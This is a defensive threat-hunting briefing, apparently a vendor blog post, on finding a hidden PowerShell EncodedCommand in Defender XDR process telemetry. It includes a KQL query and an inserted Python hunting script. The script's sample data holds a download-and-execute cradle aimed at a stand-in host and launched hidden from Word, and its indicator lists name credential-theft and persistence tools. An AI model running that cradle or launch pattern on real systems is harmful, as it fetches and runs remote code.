Microsoft Defender XDR • DeviceProcessEvents • PowerShell Investigation

The EncodedCommand Was Buried In Noise

The endpoint looked healthy.

No high-severity alert fired. No ransomware was detected. No incident was created.

But inside thousands of normal process events, one PowerShell EncodedCommand was waiting to be found.

The command was not hidden by encryption. It was hidden by noise.

Briefing summary

A workstation generated thousands of legitimate process events. Agent Foskett reviewed PowerShell activity inside DeviceProcessEvents and found a single EncodedCommand hidden amongst routine administration, software deployment and endpoint management noise.

PowerShell command-line analysis
DeviceProcessEvents hunting
Suspicious activity hidden by volume

What happened

The endpoint looked healthy. The dashboard stayed quiet. The suspicious command was present the whole time.
The endpoint looked healthy: the device was reporting normally. Microsoft Defender showed no active incident and no user had reported a problem.
PowerShell was everywhere: management scripts, software deployments, monitoring tools and security automation generated regular PowerShell activity.
Nothing looked urgent: the suspicious activity blended into normal operations. No single event stood out until the command lines were reviewed.

The query that started the investigation

Agent Foskett started with PowerShell process activity and followed the command line.
deviceprocessevents-powershell.kql
// Every PowerShell process on every onboarded device in the last 7 days
DeviceProcessEvents
| where Timestamp > ago(7d)
// PowerShell 7 runs as pwsh.exe; use FileName in~ ("powershell.exe", "pwsh.exe") if it is deployed
| where FileName =~ "powershell.exe"
// InitiatingProcessFileName is the parent; ProcessCommandLine is what PowerShell was asked to run
| project Timestamp, DeviceName, InitiatingProcessFileName, ProcessCommandLine
| order by Timestamp desc
Hundreds of rows returned: the query did not reveal a dramatic alert. It returned normal-looking PowerShell activity from a busy endpoint environment.
The command line mattered: the process name alone was not enough. ProcessCommandLine showed what PowerShell had actually been asked to do.
The noise was the hiding place: the suspicious command was not invisible. It was simply surrounded by thousands of ordinary events.

One command looked different

Most commands looked like routine administration. One row did not.
suspicious-command.txt
powershell.exe -EncodedCommand SQBFAFgAKABOAGU...
// the blob is truncated on this page; its visible prefix is base64 of UTF-16LE text and decodes to IEX(Ne
// nearby noise: Install-Module
// nearby noise: Intune Management Extension
// nearby noise: Defender remediation task
// the suspicious command was just another row
The command was encoded: EncodedCommand does not automatically prove compromise, but it does make the intent harder to understand at a glance.
The row was easy to miss: it appeared between legitimate management actions and could easily have been dismissed as routine scripting.
The investigation changed: once the command was isolated, the question changed from whether PowerShell ran to what PowerShell executed.

Agent Foskett moment

The attacker did not hide the command particularly well. They hid it among everything else.
Encoding was not the only trick: the encoded text was visible. The PowerShell process was visible. The execution chain was visible. The telemetry existed the entire time.
Volume created the camouflage: thousands of normal events surrounded the suspicious command. The noise made the unusual behaviour feel ordinary.
The command became evidence: once decoded and placed into the timeline, the command was no longer just text. It became part of the investigation.
What it was not: it was not a dramatic ransomware alert, a named malware family or an obvious high-severity incident.
What it might have been: it may have been suspicious script execution, staged download behaviour, hands-on-keyboard activity or post-compromise automation.
Why it mattered: modern attacks often succeed because defenders stop at the dashboard instead of following the behaviour hidden in the telemetry.

Following the execution chain

The process name rarely tells the full story. The parent, child and network activity often do.
Review the parent process: determine what launched PowerShell and whether that parent normally creates scripted child activity. A management agent spawning PowerShell is expected; an Office application or a browser doing so is not.
Decode and inspect intent: extract the encoded content and decode it as base64 over UTF-16LE text (which is what -EncodedCommand carries), never by running it, then look for download, execution, credential access or persistence behaviour.
Correlate network activity: check whether network connections, downloads or suspicious remote hosts appeared shortly after the encoded command ran.

What most environments miss

Visibility alone is not enough when legitimate administration creates constant noise.
PowerShell is not automatically bad: many environments rely on PowerShell for management, deployment, security automation and support tasks.
EncodedCommand is not automatically safe: administrative use exists, but attackers also use encoding to slow down human interpretation and hide intent.
Noise is an attacker advantage: when analysts are overloaded by normal telemetry, unusual behaviour can hide in plain sight.

How defenders can investigate it

Start with the command line, then rebuild the behaviour around it.
Hunt for encoded commands: search ProcessCommandLine for -EncodedCommand and its short forms (-enc, -ec, -e). powershell.exe accepts any unambiguous prefix of the parameter name, case-insensitively, so a search for the full spelling alone will miss most encoded commands.
Compare against normal activity: separate known management scripts from unusual execution chains, strange parents and unexpected users or devices.
Reconstruct the timeline: place the encoded command beside file, network, logon and process events to understand what happened next.
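To make the three steps above, and the decode step under Following the execution chain, concrete, here is an added Python example. It is not code from this page or from GEMXIT. It runs the hunt over a handful of constructed DeviceProcessEvents-style rows: it matches every spelling of the encoded flag, decodes the base64/UTF-16LE payload, tags what the decoded script tries to do and ranks findings against an assumed baseline of parents that are allowed to spawn PowerShell. The sample rows, the indicator patterns and the EXPECTED_PARENTS list are assumptions for illustration; in Advanced Hunting the first filter is a has_any over ProcessCommandLine, and the decoding and scoring are the parts the portal does not do for you.

```python
"""Added example: hunt DeviceProcessEvents-style rows for PowerShell encoded commands,
decode them and score what the decoded script does. Sample data is constructed."""
import base64
import binascii
import re

COLUMNS = ("Timestamp", "DeviceName", "InitiatingProcessFileName", "ProcessCommandLine")

# Assumed baseline: parents that legitimately spawn PowerShell in this made-up environment.
EXPECTED_PARENTS = {
    "microsoft.management.services.intunewindowsagent.exe",  # Intune Management Extension
    "msmpeng.exe",                                           # Defender remediation tasks
    "ccmexec.exe",                                           # Configuration Manager client
}

# Indicator patterns grouped by the behaviours the page says to look for in decoded content.
INDICATORS = {
    "download": [r"DownloadString", r"DownloadFile", r"Invoke-WebRequest", r"\biwr\b",
                 r"Net\.WebClient", r"Invoke-RestMethod", r"Start-BitsTransfer"],
    "execution": [r"\bIEX\b", r"Invoke-Expression", r"FromBase64String", r"Start-Process"],
    "credential": [r"\blsass\b", r"mimikatz", r"sekurlsa", r"comsvcs"],
    "persistence": [r"schtasks", r"Register-ScheduledTask", r"New-Service",
                    r"CurrentVersion\\Run", r"__EventConsumer"],
}

# powershell.exe resolves any unambiguous prefix of a parameter name, so -e, -ec, -enc and
# -EncodedCommand are the same switch. Capture what follows "-e" plus the next token, then
# validate that the captured letters are a prefix of "ncodedcommand" (or the "c" of -ec).
FLAG_RE = re.compile(r"(?<!\S)-e(\w*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """What PowerShell expects after -EncodedCommand: base64 over UTF-16LE bytes, not UTF-8."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell(blob: str):
    """Inverse of encode_powershell; None (not an exception) for bad base64 or odd-length
    UTF-16, which is what a blob truncated in the telemetry looks like."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def find_encoded_argument(command_line: str):
    """Return (flag as written, base64 blob) for the first encoded argument, else None."""
    for m in FLAG_RE.finditer(command_line):
        suffix = m.group(1).lower()
        if suffix == "c" or "ncodedcommand".startswith(suffix):   # rejects -ep, -ExecutionPolicy
            return m.group(0).split(None, 1)[0], m.group(2)
    return None


def classify(script: str) -> list:
    """Behaviour categories whose indicators appear in the decoded script."""
    return [cat for cat, pats in INDICATORS.items()
            if any(re.search(p, script, re.IGNORECASE) for p in pats)]


def hunt(events, expected_parents=EXPECTED_PARENTS) -> list:
    """One finding per encoded command, most suspicious first. Score = number of behaviour
    categories, +2 for a parent outside the baseline, +1 if the blob does not decode."""
    findings = []
    for row in events:
        rec = dict(zip(COLUMNS, row))
        hit = find_encoded_argument(rec["ProcessCommandLine"])
        if hit is None:
            continue                          # plain command line: visible, just not encoded
        flag, blob = hit
        decoded = decode_powershell(blob)
        categories = classify(decoded) if decoded is not None else []
        parent_ok = rec["InitiatingProcessFileName"].lower() in expected_parents
        score = len(categories) + (0 if parent_ok else 2) + (0 if decoded is not None else 1)
        findings.append({"timestamp": rec["Timestamp"], "device": rec["DeviceName"],
                         "parent": rec["InitiatingProcessFileName"], "flag": flag,
                         "decoded": decoded, "categories": categories,
                         "parent_expected": parent_ok, "score": score})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed rows: routine management noise around one encoded command from an unexpected
# parent and one benign encoded command from an expected parent (encoding alone is not bad).
BENIGN_SCRIPT = "Get-Service -Name IntuneManagementExtension | Select-Object Status"
MALICIOUS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
INTUNE = "Microsoft.Management.Services.IntuneWindowsAgent.exe"
SAMPLE_EVENTS = [
    ("2024-05-01T09:00:01Z", "WS-042", INTUNE,
     "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\ProgramData\\Intune\\abc.ps1"),
    ("2024-05-01T09:02:15Z", "WS-042", INTUNE,
     "powershell.exe -NoProfile -EncodedCommand " + encode_powershell(BENIGN_SCRIPT)),
    ("2024-05-01T09:05:40Z", "WS-042", "WINWORD.EXE",
     "powershell.exe -nop -w hidden -enc " + encode_powershell(MALICIOUS_SCRIPT)),
    ("2024-05-01T09:10:02Z", "WS-042", "powershell.exe",
     "powershell.exe -Command Install-Module -Name PSWindowsUpdate -Force"),
    ("2024-05-01T09:12:30Z", "WS-042", "MsMpEng.exe",
     "powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\Defender\\Remediation.ps1"),
]
```

Calling hunt(SAMPLE_EVENTS) returns two findings: the WINWORD.EXE row scores first with download and execution indicators and an unexpected parent, while the Intune row decodes to a harmless Get-Service and scores zero, which is the point the page makes about encoded commands not being automatically bad. The decoder is deliberately tolerant: feeding it the truncated blob shown on this page returns None rather than crashing the hunt, and such rows still surface because an undecodable blob adds to the score.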

Final thought

The command was not invisible. It was waiting for someone to care enough to look.
At GEMXIT: we help organisations investigate Microsoft Defender XDR telemetry, PowerShell execution, endpoint behaviour, suspicious command lines and hidden activity across Microsoft security environments. If you want to understand how this applies to your environment, see our Cyber Security services.
Agent Foskett mindset: do not only ask whether PowerShell ran. Ask who launched it, what command was passed, whether it was encoded, what happened next and whether the behaviour belongs in that environment.

A single EncodedCommand was buried inside thousands of process events. Explore related investigations including The PowerShell Command Was Base64 Encoded, The Child Process Shouldn't Have Existed, and The Process Tree Told The Real Story.

Develop IT. Protect IT. GEMXIT PTY LTD | GEMXIT UK LTD

PowerShell EncodedCommand Investigation

This Agent Foskett briefing explains how a single PowerShell EncodedCommand can be buried inside high-volume Microsoft Defender XDR process telemetry and why defenders should investigate encoded command-line activity.

DeviceProcessEvents And ProcessCommandLine Analysis

Microsoft Defender XDR DeviceProcessEvents can help defenders review parent processes, child processes, command lines, timestamps and execution chains that reveal suspicious PowerShell behaviour.

Threat Hunting Through Operational Noise

Modern environments generate large volumes of legitimate endpoint telemetry. Attackers can hide suspicious activity inside normal administration, software deployment, management scripts and routine PowerShell execution.